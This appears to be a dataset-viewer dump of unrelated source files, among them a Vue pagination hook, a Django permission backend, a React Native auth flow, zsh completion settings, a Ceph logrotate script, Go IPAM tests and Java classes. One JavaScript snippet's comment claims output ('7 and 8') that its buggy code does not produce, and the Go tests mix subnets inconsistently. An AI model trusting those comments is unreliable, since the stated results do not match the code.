text stringlengths 1 1.05M |
|---|
<filename>components/table/hooks/usePagination.ts
import useState from '../../_util/hooks/useState';
import type { Ref } from 'vue';
import { computed } from 'vue';
import type { PaginationProps } from '../../pagination';
import type { TablePaginationConfig } from '../interface';
export const DEFAULT_PAGE_SIZE = 10;
export function getPaginationParam(
pagination: TablePaginationConfig | boolean | undefined,
mergedPagination: TablePaginationConfig,
) {
const param: any = {
current: mergedPagination.current,
pageSize: mergedPagination.pageSize,
};
const paginationObj = pagination && typeof pagination === 'object' ? pagination : {};
Object.keys(paginationObj).forEach(pageProp => {
const value = (mergedPagination as any)[pageProp];
if (typeof value !== 'function') {
param[pageProp] = value;
}
});
return param;
}
function extendsObject<T extends Object>(...list: T[]) {
const result: T = {} as T;
list.forEach(obj => {
if (obj) {
Object.keys(obj).forEach(key => {
const val = (obj as any)[key];
if (val !== undefined) {
(result as any)[key] = val;
}
});
}
});
return result;
}
export default function usePagination(
totalRef: Ref<number>,
paginationRef: Ref<TablePaginationConfig | false | undefined>,
onChange: (current: number, pageSize: number) => void,
): [Ref<TablePaginationConfig>, () => void] {
const pagination = computed(() =>
paginationRef.value && typeof paginationRef.value === 'object' ? paginationRef.value : {},
);
const paginationTotal = computed(() => pagination.value.total || 0);
const [innerPagination, setInnerPagination] = useState<{
current?: number;
pageSize?: number;
}>(() => ({
current: 'defaultCurrent' in pagination.value ? pagination.value.defaultCurrent : 1,
pageSize:
'defaultPageSize' in pagination.value ? pagination.value.defaultPageSize : DEFAULT_PAGE_SIZE,
}));
// ============ Basic Pagination Config ============
const mergedPagination = computed(() => {
const mP = extendsObject<Partial<TablePaginationConfig>>(
innerPagination.value,
pagination.value,
{
total: paginationTotal.value > 0 ? paginationTotal.value : totalRef.value,
},
);
// Reset `current` if data length or pageSize changed
const maxPage = Math.ceil((paginationTotal.value || totalRef.value) / mP.pageSize!);
if (mP.current! > maxPage) {
// Prevent a maximum page count of 0
mP.current = maxPage || 1;
}
return mP;
});
const refreshPagination = (current = 1, pageSize?: number) => {
if (pagination.value === false) return;
setInnerPagination({
current,
pageSize: pageSize || mergedPagination.value.pageSize,
});
};
const onInternalChange: PaginationProps['onChange'] = (current, pageSize) => {
if (pagination.value) {
pagination.value.onChange?.(current, pageSize);
}
refreshPagination(current, pageSize);
onChange(current, pageSize || mergedPagination.value.pageSize);
};
return [
computed(() => {
return pagination.value === false
? {}
: { ...mergedPagination.value, onChange: onInternalChange };
}),
refreshPagination,
];
}
|
const findTwoSmallestElements = function(array) {
let smallestNumber = array[0];
let secondSmallestNumber = null;
for (let i=1; i<array.length; i++) {
if (array[i] > 0 && array[i] < smallestNumber) {
secondSmallestNumber = smallestNumber;
smallestNumber = array[i];
} else if (array[i] > 0 && array[i] < secondSmallestNumber) {
secondSmallestNumber = array[i];
}
}
return [smallestNumber, secondSmallestNumber];
}
let array = [4, 15, 11, 9, 0, 8, 7, -1]
let smallestTwo = findTwoSmallestElements(array);
console.log("The two smallest elements are: " + smallestTwo[0] + " and " + smallestTwo[1]); // Output: "The two smallest elements are: 7 and 8" |
# Using recursion to sum the numbers in a list
def recursive_sum(arr):
if len(arr) == 0:
return 0 # Base case
else:
return arr[0] + recursive_sum(arr[1:]) # Recursive case
print("Sum of the list:", recursive_sum([2, 4, 6, 8])) |
package io.opensphere.mantle.icon.chooser.view;
import javafx.scene.layout.AnchorPane;
import io.opensphere.mantle.icon.chooser.model.IconModel;
/** Packages UI elements into one pane. */
public class IconView extends AnchorPane
{
/** Panel comprised of Tree and icon display. */
final private IconSelectionPanel myMainPanel;
/** The Model for the entire UI. */
private final IconModel myPanelModel;
/**
* Creates sub-panels for UI.
*
* @param panelModel the model used for the UI.
*/
public IconView(IconModel panelModel)
{
myPanelModel = panelModel;
myMainPanel = new IconSelectionPanel(myPanelModel);
setTopAnchor(myMainPanel, Double.valueOf(0.0));
setBottomAnchor(myMainPanel, Double.valueOf(0.0));
setLeftAnchor(myMainPanel, Double.valueOf(0.0));
setRightAnchor(myMainPanel, Double.valueOf(0.0));
getChildren().addAll(myMainPanel);
}
/**
* Gets the panel on which details are rendered.
*
* @return the panel on which details are rendered.
*/
public IconDetail getDetailPanel()
{
return myMainPanel.getDetailPane();
}
}
|
<gh_stars>1-10
from django.contrib.auth.backends import ModelBackend as BaseModelBackend
class ModelBackend(BaseModelBackend):
"""Custom permission backend that uses model methods to check for permissions."""
def get_user_permissions(self, user_obj, obj=None):
base_permissions = super().get_user_permissions(user_obj, obj)
return base_permissions
def get_group_permissions(self, user_obj, obj=None):
base_permissions = super().get_group_permissions(user_obj, obj)
return base_permissions
def get_all_permissions(self, user_obj, obj=None):
base_permissions = super().get_all_permissions(user_obj, obj)
return base_permissions
def has_perm(self, user_obj, perm, obj=None):
base_has_perm = super().has_perm(user_obj, perm, obj)
return base_has_perm
def has_module_perms(self, user_obj, app_label):
base_has_module_perms = super().has_module_perms(user_obj, app_label)
return base_has_module_perms
def with_perm(self, perm, is_active=True, include_superusers=True, obj=None):
base_with_perm = super().with_perm(perm, is_active, include_superusers, obj)
return base_with_perm
|
import { Trans } from '@lingui/macro';
import React, { Component } from 'react';
import Dialog from '../UI/Dialog';
import Window from '../Utils/Window';
import FlatButton from '../UI/FlatButton';
import Text from '../UI/Text';
import { ResponsiveWindowMeasurer } from '../UI/Reponsive/ResponsiveWindowMeasurer';
import Fullscreen from '@material-ui/icons/Fullscreen';
import RaisedButton from '../UI/RaisedButton';
import { Spacer, Line } from '../UI/Grid';
export default class BetaIntroDialog extends Component {
_onOpenWebsite() {
Window.openExternalURL('http://gdevelop-app.com');
}
render() {
const { open, onClose } = this.props;
return (
<ResponsiveWindowMeasurer>
{windowWidth => (
<Dialog
title={<Trans>Welcome to GDevelop</Trans>}
actions={[
<FlatButton
key="download"
label={<Trans>Download GDevelop desktop app</Trans>}
primary={false}
onClick={this._onOpenWebsite}
/>,
<FlatButton
label={<Trans>Close</Trans>}
primary={false}
onClick={onClose}
key="close"
/>,
]}
open={open}
onRequestClose={onClose}
>
<div>
<Text>
<Trans>
This is a version of GDevelop 5 that you can try online.
</Trans>
</Text>
<Text>
Choose a <b>new project to create</b>, then edit the scene or
the events ruling the game. You can{' '}
<b>launch a preview of your game</b> at any time.
</Text>
<Text>
<Trans>
Download the full version of GDevelop on your desktop computer
to create your own game without limits!
</Trans>
</Text>
{windowWidth === 'small' &&
(!Window.isFullscreen() ? (
<React.Fragment>
<Spacer />
<Text>
<Trans>
You're working on a small screen. It's recommended to
activate Fullscreen Mode for using GDevelop.
</Trans>
</Text>
<Line justifyContent="center">
<RaisedButton
label={<Trans>Activate Fullscreen</Trans>}
primary
onClick={() => {
Window.requestFullscreen();
setTimeout(() => {
this.forceUpdate();
}, 250 /* Let a bit of time for the fullscreen to kick in */);
}}
labelPosition="before"
icon={<Fullscreen />}
/>
</Line>
</React.Fragment>
) : (
<Line justifyContent="center">
<RaisedButton
label={<Trans>Start using GDevelop</Trans>}
primary
onClick={onClose}
labelPosition="before"
/>
</Line>
))}
</div>
</Dialog>
)}
</ResponsiveWindowMeasurer>
);
}
}
|
#
# Sets completion options.
#
# Authors:
# Robby Russell <robby@planetargon.com>
# Sorin Ionescu <sorin.ionescu@gmail.com>
#
# Return if requirements are not found.
if [[ "$TERM" == 'dumb' ]]; then
return 1
fi
# Add zsh-completions to $fpath.
fpath=("${0:h}/external/src" $fpath)
# Load and initialize the completion system ignoring insecure directories.
autoload -Uz compinit && compinit -i
#
# Options
#
setopt COMPLETE_IN_WORD # Complete from both ends of a word.
setopt ALWAYS_TO_END # Move cursor to the end of a completed word.
setopt PATH_DIRS # Perform path search even on command names with slashes.
setopt AUTO_MENU # Show completion menu on a succesive tab press.
setopt AUTO_LIST # Automatically list choices on ambiguous completion.
setopt AUTO_PARAM_SLASH # If completed parameter is a directory, add a trailing slash.
unsetopt MENU_COMPLETE # Do not autoselect the first completion entry.
unsetopt FLOW_CONTROL # Disable start/stop characters in shell editor.
#
# Styles
#
# Use caching to make completion for cammands such as dpkg and apt usable.
zstyle ':completion::complete:*' use-cache on
zstyle ':completion::complete:*' cache-path "${ZDOTDIR:-$HOME}/.zcompcache"
# Case-insensitive (all), partial-word, and then substring completion.
if zstyle -t ':prezto:module:completion:*' case-sensitive; then
zstyle ':completion:*' matcher-list 'r:|[._-]=* r:|=*' 'l:|=* r:|=*'
setopt CASE_GLOB
else
zstyle ':completion:*' matcher-list 'm:{a-zA-Z}={A-Za-z}' 'r:|[._-]=* r:|=*' 'l:|=* r:|=*'
unsetopt CASE_GLOB
fi
# Group matches and describe.
zstyle ':completion:*:*:*:*:*' menu select
zstyle ':completion:*:matches' group 'yes'
zstyle ':completion:*:options' description 'yes'
zstyle ':completion:*:options' auto-description '%d'
zstyle ':completion:*:corrections' format ' %F{green}-- %d (errors: %e) --%f'
zstyle ':completion:*:descriptions' format ' %F{yellow}-- %d --%f'
zstyle ':completion:*:messages' format ' %F{purple} -- %d --%f'
zstyle ':completion:*:warnings' format ' %F{red}-- no matches found --%f'
zstyle ':completion:*:default' list-prompt '%S%M matches%s'
zstyle ':completion:*' format ' %F{yellow}-- %d --%f'
zstyle ':completion:*' group-name ''
zstyle ':completion:*' verbose yes
# Fuzzy match mistyped completions.
zstyle ':completion:*' completer _complete _match _approximate
zstyle ':completion:*:match:*' original only
zstyle ':completion:*:approximate:*' max-errors 1 numeric
# Increase the number of errors based on the length of the typed word.
zstyle -e ':completion:*:approximate:*' max-errors 'reply=($((($#PREFIX+$#SUFFIX)/3))numeric)'
# Don't complete unavailable commands.
zstyle ':completion:*:functions' ignored-patterns '(_*|pre(cmd|exec))'
# Array completion element sorting.
zstyle ':completion:*:*:-subscript-:*' tag-order indexes parameters
# Directories
zstyle ':completion:*:default' list-colors ${(s.:.)LS_COLORS}
zstyle ':completion:*:*:cd:*' tag-order local-directories directory-stack path-directories
zstyle ':completion:*:*:cd:*:directory-stack' menu yes select
zstyle ':completion:*:-tilde-:*' group-order 'named-directories' 'path-directories' 'users' 'expand'
zstyle ':completion:*' squeeze-slashes true
# History
zstyle ':completion:*:history-words' stop yes
zstyle ':completion:*:history-words' remove-all-dups yes
zstyle ':completion:*:history-words' list false
zstyle ':completion:*:history-words' menu yes
# Environmental Variables
zstyle ':completion::*:(-command-|export):*' fake-parameters ${${${_comps[(I)-value-*]#*,}%%,*}:#-*-}
# Populate hostname completion.
zstyle -e ':completion:*:hosts' hosts 'reply=(
${=${=${=${${(f)"$(cat {/etc/ssh_,~/.ssh/known_}hosts(|2)(N) 2>/dev/null)"}%%[#| ]*}//\]:[0-9]*/ }//,/ }//\[/ }
${=${(f)"$(cat /etc/hosts(|)(N) <<(ypcat hosts 2>/dev/null))"}%%\#*}
${=${${${${(@M)${(f)"$(cat ~/.ssh/config 2>/dev/null)"}:#Host *}#Host }:#*\**}:#*\?*}}
)'
# Don't complete uninteresting users...
zstyle ':completion:*:*:*:users' ignored-patterns \
adm amanda apache avahi beaglidx bin cacti canna clamav daemon \
dbus distcache dovecot fax ftp games gdm gkrellmd gopher \
hacluster haldaemon halt hsqldb ident junkbust ldap lp mail \
mailman mailnull mldonkey mysql nagios \
named netdump news nfsnobody nobody nscd ntp nut nx openvpn \
operator pcap postfix postgres privoxy pulse pvm quagga radvd \
rpc rpcuser rpm shutdown squid sshd sync uucp vcsa xfs '_*'
# ... unless we really want to.
zstyle '*' single-ignored show
# Ignore multiple entries.
zstyle ':completion:*:(rm|kill|diff):*' ignore-line other
zstyle ':completion:*:rm:*' file-patterns '*:all-files'
# Kill
zstyle ':completion:*:*:*:*:processes' command 'ps -u $USER -o pid,user,comm -w'
zstyle ':completion:*:*:kill:*:processes' list-colors '=(#b) #([0-9]#) ([0-9a-z-]#)*=01;36=0=01'
zstyle ':completion:*:*:kill:*' menu yes select
zstyle ':completion:*:*:kill:*' force-list always
zstyle ':completion:*:*:kill:*' insert-ids single
# Man
zstyle ':completion:*:manuals' separate-sections true
zstyle ':completion:*:manuals.(^1*)' insert-sections true
# Media Players
zstyle ':completion:*:*:mpg123:*' file-patterns '*.(mp3|MP3):mp3\ files *(-/):directories'
zstyle ':completion:*:*:mpg321:*' file-patterns '*.(mp3|MP3):mp3\ files *(-/):directories'
zstyle ':completion:*:*:ogg123:*' file-patterns '*.(ogg|OGG|flac):ogg\ files *(-/):directories'
zstyle ':completion:*:*:mocp:*' file-patterns '*.(wav|WAV|mp3|MP3|ogg|OGG|flac):ogg\ files *(-/):directories'
# Mutt
if [[ -s "$HOME/.mutt/aliases" ]]; then
zstyle ':completion:*:*:mutt:*' menu yes select
zstyle ':completion:*:mutt:*' users ${${${(f)"$(<"$HOME/.mutt/aliases")"}#alias[[:space:]]}%%[[:space:]]*}
fi
# SSH/SCP/RSYNC
zstyle ':completion:*:(scp|rsync):*' tag-order 'hosts:-host:host hosts:-domain:domain hosts:-ipaddr:ip\ address *'
zstyle ':completion:*:(scp|rsync):*' group-order users files all-files hosts-domain hosts-host hosts-ipaddr
zstyle ':completion:*:ssh:*' tag-order 'hosts:-host:host hosts:-domain:domain hosts:-ipaddr:ip\ address *'
zstyle ':completion:*:ssh:*' group-order users hosts-domain hosts-host users hosts-ipaddr
zstyle ':completion:*:(ssh|scp|rsync):*:hosts-host' ignored-patterns '*(.|:)*' loopback ip6-loopback localhost ip6-localhost broadcasthost
zstyle ':completion:*:(ssh|scp|rsync):*:hosts-domain' ignored-patterns '<->.<->.<->.<->' '^[-[:alnum:]]##(.[-[:alnum:]]##)##' '*@*'
zstyle ':completion:*:(ssh|scp|rsync):*:hosts-ipaddr' ignored-patterns '^(<->.<->.<->.<->|(|::)([[:xdigit:].]##:(#c,2))##(|%*))' '127.0.0.<->' '255.255.255.255' '::1' 'fe80::*'
zstyle ':completion:*:*:git:*' script ~/.git-completion.bash |
../phyhat_gene.py -f ex_gene.fa -d ex_gene.db -n "SpA SpB SpC SpD spE" |
package com.mblinn.mbfpp.oo.strategy
object PeopleExample {
case class Person(
firstName: Option[String],
middleName: Option[String],
lastName: Option[String])
def isFirstNameValid(person: Person) = person.firstName.isDefined
def isFullNameValid(person: Person) = person match {
case Person(firstName, middleName, lastName) =>
firstName.isDefined && middleName.isDefined && lastName.isDefined
}
def personCollector(isValid: (Person) => Boolean) = {
var validPeople = Vector[Person]()
(person: Person) => {
if(isValid(person)) validPeople = validPeople :+ person
validPeople
}
}
val p1 = Person(Some("John"), Some("Quincy"), Some("Adams"))
val p2 = Person(Some("Mike"), None, Some("Linn"))
val p3 = Person(None, None, None)
} |
export * from './error.middleware';
export * from './validation.middleware';
export * from './i18n.middleware';
|
const assert = require('assert');
const std = require('../../src');
/* global describe it */
describe('unique test', () => {
it('list test', () => {
const list = new std.List();
const limit = 1000;
for (let i = 0; i < limit; i += 1) {
list.pushBack(Math.floor(Math.random() * 10));
}
std.unique(list);
const dict = {};
for (let node = list.begin(); node !== list.end(); node = node.getNext()) {
assert.strictEqual(dict[node.getData()], undefined);
dict[node.getData()] = true;
}
});
it('MultiSetTree removeCondition test', () => {
const multiSetTree = new std.MultiSetTree();
const limit = 1000;
for (let i = 0; i < limit; i += 1) {
multiSetTree.insert(Math.floor(Math.random() * 10));
}
std.unique(multiSetTree);
const dict = {};
for (let node = multiSetTree.begin(); node !== multiSetTree.end(); node = node.getNext()) {
assert.strictEqual(dict[node.getKey()], undefined);
dict[node.getKey()] = true;
}
});
it('mutiMapTree removeCondition test', () => {
const multiMapTree = new std.MultiMapTree();
const limit = 1000;
for (let i = 0; i < limit; i += 1) {
multiMapTree.insert(Math.floor(Math.random() * 10), i);
}
std.unique(multiMapTree);
const dict = {};
for (let node = multiMapTree.begin(); node !== multiMapTree.end(); node = node.getNext()) {
assert.strictEqual(dict[node.getKey()], undefined);
dict[node.getKey()] = true;
}
});
});
|
package info.u250.c2d.box2d.model.joint;
import info.u250.c2d.box2d.model.b2JointDefModel;
import com.badlogic.gdx.math.Vector2;
public class b2RevoluteJointDefModel extends b2JointDefModel{
private static final long serialVersionUID = 1L;
/** The local anchor point relative to body1's origin. */
public final Vector2 localAnchorA = new Vector2();
/** The local anchor point relative to body2's origin. */
public final Vector2 localAnchorB = new Vector2();;
/** The body2 angle minus body1 angle in the reference state (Degrees). */
public float referenceDegrees = 0;
/** A flag to enable joint limits. */
public boolean enableLimit = false;
/** The lower angle for the joint limit (Degrees). */
public float lowerDegrees = 0;
/** The upper angle for the joint limit (Degrees). */
public float upperDegrees = 0;
/** A flag to enable the joint motor. */
public boolean enableMotor = false;
/** The desired motor speed. Usually in radians per second. */
public float motorSpeed = 0;
/** The maximum motor torque used to achieve the desired motor speed. Usually in N-m. */
public float maxMotorTorque = 0;
}
|
package malte0811.controlengineering.util;
import com.mojang.datafixers.util.Pair;
import net.minecraftforge.common.util.NonNullConsumer;
import java.util.Objects;
public class Clearable<T> {
private T value;
private Clearable(T value) {
this.value = value;
}
public static <T> Pair<Clearable<T>, Runnable> create(T value) {
Clearable<T> ret = new Clearable<>(value);
return Pair.of(ret, () -> ret.value = null);
}
public T getValue() {
return Objects.requireNonNull(value);
}
public void ifPresent(NonNullConsumer<T> out) {
if (value != null) {
out.accept(value);
}
}
public boolean isPresent() {
return value != null;
}
}
|
import base64
# Function to encode
def encode(text):
encoded_text = base64.b64encode(text.encode('utf-8'))
return encoded_text
# Function to decode
def decode(text):
decoded_text = base64.b64decode(text).decode('utf-8')
return decoded_text
# Main function
def main():
text = "Hello World!"
encoded_text = encode(text)
print(encoded_text)
decoded_text = decode(encoded_text)
print(decoded_text)
if __name__ == '__main__':
main() |
package network
import (
"net"
"os"
"testing"
)
func TestAllocate(t *testing.T) {
subnet := `{"192.168.0.0/24":"1100000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000"}`
tests := []struct {
name string
want string
}{
{"case1", subnet},
}
for _, tt := range tests {
t.Run(tt.name, func(t *testing.T) {
_, ipnet, _ := net.ParseCIDR("192.168.10.1/24")
ip, err := ipAllocator.Allocate(ipnet)
t.Logf("alloc ip: %v, err: %v", ip, err)
_, ipnet, _ = net.ParseCIDR("192.168.10.1/24")
ip, err = ipAllocator.Allocate(ipnet)
t.Logf("alloc ip: %v, err: %v", ip, err)
b, err := os.ReadFile(ipamDefaultAllocatorPath)
if err != nil {
t.Fatal(err)
}
if string(b) != tt.want {
t.Fatal("unexpected result")
}
})
}
// cat /var/run/ddocker/network/ipam/subnet.json
// subnet := `{"192.168.0.0/24":"1100000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000"}`
}
func TestReleases(t *testing.T) {
subnet := `{"192.168.0.0/24":"0100000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000"}`
tests := []struct {
name string
want string
}{
{"case1", subnet},
}
for _, tt := range tests {
t.Run(tt.name, func(t *testing.T) {
ip, ipnet, _ := net.ParseCIDR("192.168.0.1/24")
err := ipAllocator.Release(ipnet, ip)
t.Logf("release err: %v", err)
b, err := os.ReadFile(ipamDefaultAllocatorPath)
if err != nil {
t.Fatal(err)
}
if string(b) != tt.want {
t.Fatal("unexpected result")
}
})
}
// cat /var/run/ddocker/network/ipam/subnet.json
// subnet := `{"192.168.0.0/24":"0100000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000"}`
}
|
#!/bin/bash
# Copied from upstream logrotate
# Upstream source at https://github.com/ceph/ceph/blob/master/src/logrotate.conf
if which invoke-rc.d > /dev/null 2>&1 && [ -x `which invoke-rc.d` ]; then
invoke-rc.d ceph reload >/dev/null
elif which service > /dev/null 2>&1 && [ -x `which service` ]; then
service ceph reload >/dev/null
fi
# Possibly reload twice, but depending on ceph.conf the reload above may be a no-op
if which initctl > /dev/null 2>&1 && [ -x `which initctl` ]; then
for daemon in osd mon mds ; do
find -L /var/lib/ceph/$daemon/ -mindepth 1 -maxdepth 1 -regextype posix-egrep -regex '.*/[A-Za-z0-9]+-[A-Za-z0-9._-]+' -printf '%P\n' \
| while read f; do
if [ -e "/var/lib/ceph/$daemon/$f/done" -o -e "/var/lib/ceph/$daemon/$f/ready" ] && [ -e "/var/lib/ceph/$daemon/$f/upstart" ] && [ ! -e "/var/lib/ceph/$daemon/$f/sysvinit" ]; then
cluster="${f%%-*}"
id="${f#*-}"
initctl reload ceph-$daemon cluster="$cluster" id="$id" 2>/dev/null || :
fi
done
done
fi
if [ -e "/etc/init.d/radosgw" ]; then
/etc/init.d/radosgw restart >/dev/null
fi
|
<filename>App.js<gh_stars>0
import React, { useContext, useState, useEffect, useMemo, useReducer } from 'react';
import { StatusBar } from 'expo-status-bar';
import { StyleSheet, Text, View } from 'react-native';
import { NavigationContainer, StackActions } from '@react-navigation/native';
import { createDrawerNavigator } from '@react-navigation/drawer';
import MainTabScreen from './screens/MainTabScreen';
import DrawerContent from './screens/DrawerContent';
import SettingsScreen from './screens/SettingsScreen';
import RootStackScreen from './screens/RootStackScreen'
import { AppProvider, AppContext } from './provider/AppProvider'
import { AuthContext } from './context/AuthContext'
import { ActivityIndicator } from 'react-native-paper';
import { HOST_WITH_PORT } from './environment';
const Drawer = createDrawerNavigator();
export default function App() {
const state = useContext(AppContext)
// const state = useContext(AppContext)
// const [isLoading, setIsLoading] = useState(true);
// const [userToken, setUserToken] = useState(null);
// const [user, setUser] = useState(null);
const initialLoginState = {
isLoading: false,
email: null,
user: null,
userId: null,
userToken: null,
isValidEmail: true,
isValidPassword: true,
};
const loginReducer = (prevState, action) => {
switch (action.type) {
case 'RETRIEVE_TOKEN':
return {
...prevState,
userToken: action.token,
isLoading: false
};
case 'LOGIN':
return {
...prevState,
email: action.id,
userToken: action.token,
isLoading: false,
userId: action.userId
};
case 'LOGOUT':
return {
...prevState,
email: null,
userToken: null,
isLoading: false,
userId: null,
};
case 'REGISTER':
return {
...prevState,
email: action.id,
userToken: action.token,
isLoading: false
};
}
};
const [loginState, dispatch] = useReducer(loginReducer, initialLoginState);
const authContext = useMemo(() => ({
signIn: (email, response) => {
// console.log(response)
// fetch(`${HOST_WITH_PORT}/login`, {
// method: "POST",
// headers: {
// "Content-Type": "application/json",
// },
// body: JSON.stringify({
// email: email,
// password: password,
// })
// }).then(response => {
// if (!response.ok) throw new Error("Email or password not found")
// return response.json()
// }).then(response => {
dispatch({
type: "LOGIN",
id: email,
token: response.token,
userId: response.user.id
})
// })
// .catch(error => {
// console.log("Error:", error)
// })
},
signOut: () => {
dispatch({
type: "LOGOUT",
})
},
signUp: (email, password) => {
// setUserToken('<PASSWORD>')
// setIsLoading(false)
fetch(`${HOST_WITH_PORT}/users`, {
method: "POST",
headers: {
"Accept": "application/json",
"Content-Type": "application/json",
},
body: JSON.stringify({
user: {
email: email,
password: password,
}
})
}).then(response => response.json())
.then(response => dispatch({
type: "REGISTER",
id: email,
token: response.token
}))
},
}), []);
if ( loginState.isLoading ) {
return (
<View style={{flex: 1, justifyContent: 'center', alignItems: 'center'}}>
<ActivityIndicator size="large" />
</View>
);
}
return (
<AuthContext.Provider value={authContext}>
<AppProvider>
<NavigationContainer>
{ loginState.userToken !== null ? (
<Drawer.Navigator initialRouteName="Home" drawerContent={props => <DrawerContent {...props} />} >
<Drawer.Screen name="HomeDrawer" component={MainTabScreen} />
<Drawer.Screen name="SettingsScreen" component={SettingsScreen} />
</Drawer.Navigator>
)
:
<RootStackScreen />
}
</NavigationContainer>
</AppProvider>
</AuthContext.Provider>
);
} |
<filename>test/test_parse_sql.rb
require File.join(File.expand_path(File.dirname(__FILE__)), 'required_file.rb')
class TestParseSql < Test::Unit::TestCase
def test_parse_sql
contents = "execute \"UPDATE topics SET highest_staff_post_number = highest_post_number\""
ast = YARD::Parser::Ruby::RubyParser.parse(contents).root
assert_equal ['topics', ['highest_staff_post_number']], parse_sql(ast[0][1])
end
def test_handle_cross_string
contents = "execute <<-SQL
UPDATE email_logs
SET user_id = u.id
FROM email_logs el
LEFT JOIN users u ON u.email = el.to_address
WHERE email_logs.id = el.id
AND email_logs.user_id IS NULL
AND NOT email_logs.skipped
SQL"
output = " UPDATE email_logs
SET user_id = u.id
FROM email_logs el
LEFT JOIN users u ON u.email = el.to_address
WHERE email_logs.id = el.id
AND email_logs.user_id IS NULL
AND NOT email_logs.skipped\n"
ast = YARD::Parser::Ruby::RubyParser.parse(contents).root
sql = handle_cross_line_string(ast[0][1][0][0].source)
assert_equal sql, output
assert_equal ['email_logs', ['user_id']], parse_sql(ast[0][1])
end
def test_handle_cross_string2
contents = "execute <<-SQL
ALTER TABLE distributors
ADD CONSTRAINT zipchk
CHECK (char_length(zipcode) = 5) NO INHERIT;
SQL"
output = " ALTER TABLE distributors
ADD CONSTRAINT zipchk
CHECK (char_length(zipcode) = 5) NO INHERIT;\n"
ast = YARD::Parser::Ruby::RubyParser.parse(contents).root
sql = handle_cross_line_string(ast[0][1][0][0].source)
assert_equal sql, output
puts "parse_sql(ast[0][1]) #{parse_sql(ast[0][1])}"
end
end |
<filename>js/sykepengesoknad/utils/beregnBrodsmulesti.js<gh_stars>1-10
import { getLedetekst } from '@navikt/digisyfo-npm';
import beregnSteg, { KVITTERING } from './beregnSteg';
import { getSykefravaerUrl, getUrlTilSoknad, getUrlTilSoknader } from '../../utils/urlUtils';
const beregnBrodsmulesti = (sti, id) => {
const dittSykefravaerSmule = {
tittel: getLedetekst('landingsside.sidetittel'),
sti: getSykefravaerUrl(),
erKlikkbar: true,
};
const soknaderSmule = {
tittel: 'Søknader om sykepenger',
sti: getUrlTilSoknader(),
erKlikkbar: true,
};
switch (beregnSteg(sti)) {
case KVITTERING: {
return [dittSykefravaerSmule, soknaderSmule, {
tittel: 'Søknad',
sti: getUrlTilSoknad(id),
erKlikkbar: true,
}, {
tittel: 'Kvittering',
}];
}
default: {
return [dittSykefravaerSmule, soknaderSmule, {
tittel: 'Søknad',
}];
}
}
};
export default beregnBrodsmulesti;
|
<filename>models/leave.schema.js
import mongoose from "mongoose"
const leaveSchema = {
leaveType: { type: String},
leaveTaken: { type: Number }
}
export const leaveModel = mongoose.model("leave", leaveSchema, 'leave') |
<filename>jframe-demo/demo-plugin/jframe-demo-elasticsearch/src/main/java/jframe/demo/elasticsearch/weike/Domain.java
package jframe.demo.elasticsearch.weike;
import java.io.Serializable;
public interface Domain extends Serializable {
}
|
/*
* Copyright 2015-present Open Networking Foundation
*
* Licensed under the Apache License, Version 2.0 (the "License");
* you may not use this file except in compliance with the License.
* You may obtain a copy of the License at
*
* http://www.apache.org/licenses/LICENSE-2.0
*
* Unless required by applicable law or agreed to in writing, software
* distributed under the License is distributed on an "AS IS" BASIS,
* WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
* See the License for the specific language governing permissions and
* limitations under the License.
*/
package org.onosproject.ui.topo;
import java.util.Collections;
import java.util.Set;
import java.util.TreeSet;
import static com.google.common.base.Preconditions.checkNotNull;
/**
* Denotes the highlighting to be applied to a link.
* {@link Flavor} is a closed set of NO-, PRIMARY-, or SECONDARY- highlighting.
* {@link Mod} is an open ended set of additional modifications (CSS classes)
* that may also be applied.
* Note that {@link #MOD_OPTICAL} and {@link #MOD_ANIMATED} are pre-defined mods.
* Label text may be set, which will also be displayed on the link.
*/
public class LinkHighlight extends AbstractHighlight {
private static final String PLAIN = "plain";
private static final String PRIMARY = "primary";
private static final String SECONDARY = "secondary";
private static final String EMPTY = "";
private static final String SPACE = " ";
private final Flavor flavor;
private final Set<Mod> mods = new TreeSet<>();
private String label = EMPTY;
/**
* Constructs a link highlight entity.
*
* @param linkId the link identifier
* @param flavor the highlight flavor
*/
public LinkHighlight(String linkId, Flavor flavor) {
super(TopoElementType.LINK, linkId);
this.flavor = checkNotNull(flavor);
}
/**
* Adds a highlighting modification to this link highlight.
*
* @param mod mod to be added
* @return self, for chaining
*/
public LinkHighlight addMod(Mod mod) {
mods.add(checkNotNull(mod));
return this;
}
/**
* Adds a label to be displayed on the link.
*
* @param label the label text
* @return self, for chaining
*/
public LinkHighlight setLabel(String label) {
this.label = label == null ? EMPTY : label;
return this;
}
/**
* Returns the highlight flavor.
*
* @return highlight flavor
*/
public Flavor flavor() {
return flavor;
}
/**
* Returns the highlight modifications.
*
* @return highlight modifications
*/
public Set<Mod> mods() {
return Collections.unmodifiableSet(mods);
}
/**
* Generates the CSS classes string from the {@link #flavor} and
* any optional {@link #mods}.
*
* @return CSS classes string
*/
public String cssClasses() {
StringBuilder sb = new StringBuilder(flavor.toString());
mods.forEach(m -> sb.append(SPACE).append(m));
return sb.toString();
}
/**
* Returns the label text.
*
* @return label text
*/
public String label() {
return label;
}
/**
* Link highlighting flavor.
*/
public enum Flavor {
NO_HIGHLIGHT(PLAIN),
PRIMARY_HIGHLIGHT(PRIMARY),
SECONDARY_HIGHLIGHT(SECONDARY);
private String cssName;
Flavor(String s) {
cssName = s;
}
@Override
public String toString() {
return cssName;
}
}
/**
* Denotes a link to be tagged as an optical link.
*/
public static final Mod MOD_OPTICAL = new Mod("optical");
/**
* Denotes a link to be tagged with animated traffic ("marching ants").
*/
public static final Mod MOD_ANIMATED = new Mod("animated");
}
|
<filename>jgrapht-master/jgrapht-core/src/main/java/org/jgrapht/traverse/DegeneracyOrderingIterator.java
/*
* (C) Copyright 2017-2018, by <NAME> and Contributors.
*
* JGraphT : a free Java graph-theory library
*
* This program and the accompanying materials are dual-licensed under
* either
*
* (a) the terms of the GNU Lesser General Public License version 2.1
